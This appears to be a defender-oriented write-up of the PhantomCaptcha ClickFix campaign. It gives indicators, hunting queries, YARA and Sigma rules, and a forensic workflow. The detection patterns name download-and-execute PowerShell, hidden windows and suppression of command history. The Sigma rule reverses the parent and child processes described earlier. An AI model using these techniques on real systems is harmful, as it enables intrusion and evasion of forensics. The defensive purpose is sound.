On October 22, 2025, SentinelLabs documented a one‑day spearphishing operation dubbed “PhantomCaptcha” that targeted Ukraine-linked NGOs and regional government staff. The chain blends a fake Cloudflare CAPTCHA with a ClickFix/Paste‑and‑Run prompt that executes staged PowerShell, culminating in a WebSocket-based RAT using JSON tasking. The campaign’s notable indicators include lure domain zoomconference[.]app, backend C2 bsnowcommunications[.]com, an embedded XOR key, and explicit attempts to suppress PowerShell history. (SentinelLabs report). (sentinelone.com)

Why it matters to DFIR

• It’s a social-engineering-heavy initial access where users self-execute the payload (ClickFix), bypassing file-centric controls. (Proofpoint background on ClickFix/Paste‑and‑Run). (proofpoint.com)
• Final C2 uses WebSocket over a web origin, complicating traditional proxy/IDS heuristics and blending under ATT&CK T1071.001 Web Protocols. (MITRE ATT&CK T1071; PT Security’s ATT&CK mirror noting WebSocket under web traffic). (attack.mitre.org)
• The actor disables PSReadLine’s history file, degrading a common host artifact unless you’ve instrumented Script Block/Module logging and/or transcription. (Set‑PSReadLineOption HistorySaveStyle; Mandiant/Google on PowerShell logging EIDs). (jdocs.mdbgo.io)

Attack chain (condensed)

1. Spearphishing email with a PDF that links to zoomconference[.]app, presenting a fake Cloudflare challenge. Clicking leads to a popup instructing “Copy token” then Win+R paste to run. (SentinelLabs; ATT&CK T1566.001/002). (sentinelone.com)
2. The button places a command on clipboard that launches PowerShell headlessly via conhost.exe, fetching a stage from /cptch/${clientId}. (SentinelLabs). (sentinelone.com)
3. Stage 1: large obfuscated PowerShell “cptch” downloader; core behavior = fetch next stage. Stage 2: “maintenance” collects host identifiers, XOR‑encodes with a hardcoded key, disables PSReadLine history, and retrieves Stage 3. Stage 3: a PowerShell RAT maintaining a WebSocket connection to bsnowcommunications[.]com, exchanging Base64‑encoded JSON tasks with keys like “cmd” and “psh”. (SentinelLabs). (sentinelone.com)

Artifacts you can pull today

• Email and doc lure
  • PDF SHA‑256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3; link to zoomconference[.]app. (SentinelLabs). (sentinelone.com)
  • ATT&CK mapping: T1566.001 Spearphishing Attachment; T1566.002 Spearphishing Link. (ATT&CK; ATT&CK). (attack.mitre.org)
• Staging and payloads
  • Stage 1 “cptch” downloader SHA‑256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44. (SentinelLabs). (sentinelone.com)
  • Stage 2 “maintenance” SHA‑256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566; XOR key: b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l; disables history via Set‑PSReadLineOption -HistorySaveStyle SaveNothing. (SentinelLabs; Set‑PSReadLineOption docs). (sentinelone.com)
  • Stage 3 RAT SHA‑256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23; WebSocket C2: wss://bsnowcommunications[.]com:80; JSON tasking keys: cmd, psh. (SentinelLabs). (sentinelone.com)
• Infrastructure
  • Lure: zoomconference[.]app → 193.233.23[.]81 (KVMKA hosting); backend C2: bsnowcommunications[.]com → 185.142.33[.]131. (SentinelLabs). (sentinelone.com)
• Local host artifacts (Windows)
  • PSReadLine history file (if not suppressed): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help reference). (artefacts.help)
  • PSReadLine option state: (Get-PSReadLineOption).HistorySaveStyle and HistorySavePath values (PowerShell 5.1+). (Microsoft Learn Get‑PSReadLineOption). (learn.microsoft.com)

Detection and hunting tips

• Process execution
  • Look for conhost.exe spawning powershell.exe with headless/hidden flags and an inline DownloadString/Invoke-Expression sequence.

// MDE: conhost -> powershell chain with clipboard-style payloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "conhost.exe"
| where FileName in~ ("powershell.exe","pwsh.exe")
| where ProcessCommandLine has_any ("DownloadString","Invoke-Expression","-WindowStyle Hidden","-NoProfile")

• Detect Set‑PSReadLineOption disabling history. If Script Block Logging is on, Event ID 4104 will capture the scriptblock text; Module logging produces 4103. (Mandiant/Google; Windows PowerShell Script Block Logging policy). (cloud.google.com)

// MDE: script block contains SaveNothing
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType == "PowerShellScriptBlockLogging"
| where AdditionalFields contains "Set-PSReadLineOption" and AdditionalFields contains "SaveNothing"

• Network and WebSocket
  • Alert on outbound WebSocket (ws/wss) to non-standard ports or rare FQDNs; flag bsnowcommunications[.]com and wss to TCP/80 in particular. Map to ATT&CK T1071.001. (ATT&CK; PT Security ATT&CK mirror noting WebSocket). (attack.mitre.org)

// MDE: rare WebSocket to suspicious infra
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "bsnowcommunications.com" or (RemotePort == 80 and RemoteUrl endswith "/" and Protocol == "Tls")
| summarize dcount(DeviceId), make_set(RemoteUrl), make_set(InitiatingProcessFileName) by bin(Timestamp, 1h)

• File/host IOCs
  • Hunt for SHA‑256s listed above; validate downloads from /cptch/* and /maintenance endpoints where recorded by proxies. (SentinelLabs). (sentinelone.com)

Forensic workflow guidance

1. Scope and preserve
   • Acquire full disk and volatile memory on suspected workstations that accessed zoomconference[.]app on October 8–9, 2025; preserve enterprise proxy logs for those dates. (SentinelLabs timeline). (sentinelone.com)
2. PowerShell evidence
   • Even if HistorySaveStyle was set to SaveNothing, Script Block Logging (EID 4104) and Module Logging (EID 4103) can retain code bodies and pipeline details when properly configured. Consider enabling transcription to a write‑only share for future incidents. (Mandiant/Google; Windows policy references). (cloud.google.com)
   • Default PSReadLine history file location (if not disabled): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help). (artefacts.help)
3. Network corroboration
   • Identify any wss:// traffic to bsnowcommunications[.]com:80 and requests to /cptch/* or /maintenance. Treat any Base64 JSON payloads with keys cmd/psh as high‑fidelity if decrypted/inspected. (SentinelLabs). (sentinelone.com)
4. Memory analysis
   • Inspect PowerShell runspaces and loaded scriptblocks in memory; look for WebSocket client usage and repeated reconnect loops consistent with a RAT.

Quick content matches (YARA/Sigma-style examples)

• YARA (Stage 2 XOR key string)

rule PhantomCaptcha_Stage2_XORKey
{
  meta:
    author = "DFIR"
    description = "Match Stage2 XOR key from PhantomCaptcha"
  strings:
    $k = "b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l" ascii
  condition:
    $k
}

• Sigma-ish command-line pattern (conceptual)

logsource:
  category: process_creation
  product: windows
selection:
  image|endswith: '\\conhost.exe'
  parent_image|endswith: '\\powershell.exe'
  commandline|contains|all:
    - 'DownloadString'
    - 'Invoke-Expression'
    - '-WindowStyle Hidden'
condition: selection
level: medium

Hardening and response actions

• Block and monitor
  • Add bsnowcommunications[.]com and zoomconference[.]app to blocklists; monitor for any new lookalike registrations such as zoomconference[.]click reported post‑takedown activity. (SentinelLabs). (sentinelone.com)
  • Alert on ws/wss traffic from endpoints where browsers are not expected to initiate persistent sockets outside sanctioned apps; prioritize non‑443 use. Map to ATT&CK T1071.001. (ATT&CK). (attack.mitre.org)
• PowerShell logging baseline
  • Enable Script Block Logging and Module Logging via GPO/MDM; consider Transcription to a central write‑only share. (Windows policy CSP; Mandiant/Google guidance). (learn.microsoft.com)
• User comms and controls
  • Educate users on “copy this token and paste into Run/PowerShell” lures; they are a current trend. (Proofpoint ClickFix analysis). (proofpoint.com)

Indicators (from reporting)

• Domains: zoomconference[.]app, bsnowcommunications[.]com. IPs: 193.233.23[.]81, 185.142.33[.]131. Paths: /cptch/${clientId}, /maintenance. Payload hashes provided above. (SentinelLabs). (sentinelone.com)

Takeaways

• Turn on PowerShell Script Block + Module Logging and consider Transcription now; create alerts for Set‑PSReadLineOption → SaveNothing.
• Hunt for conhost.exe → powershell.exe chains with DownloadString/Invoke‑Expression and hidden window flags.
• Monitor/deny outbound WebSocket C2 to unknown domains and non‑standard ports; watch for bsnowcommunications[.]com and successors.
• Pull enterprise proxy logs for October 8–9, 2025 to scope access to zoomconference[.]app and related pivots; acquire memory on suspected hosts.
• Push user messaging: never paste “tokens” into Run/PowerShell from web prompts; report such prompts immediately. (Proofpoint ClickFix). (proofpoint.com)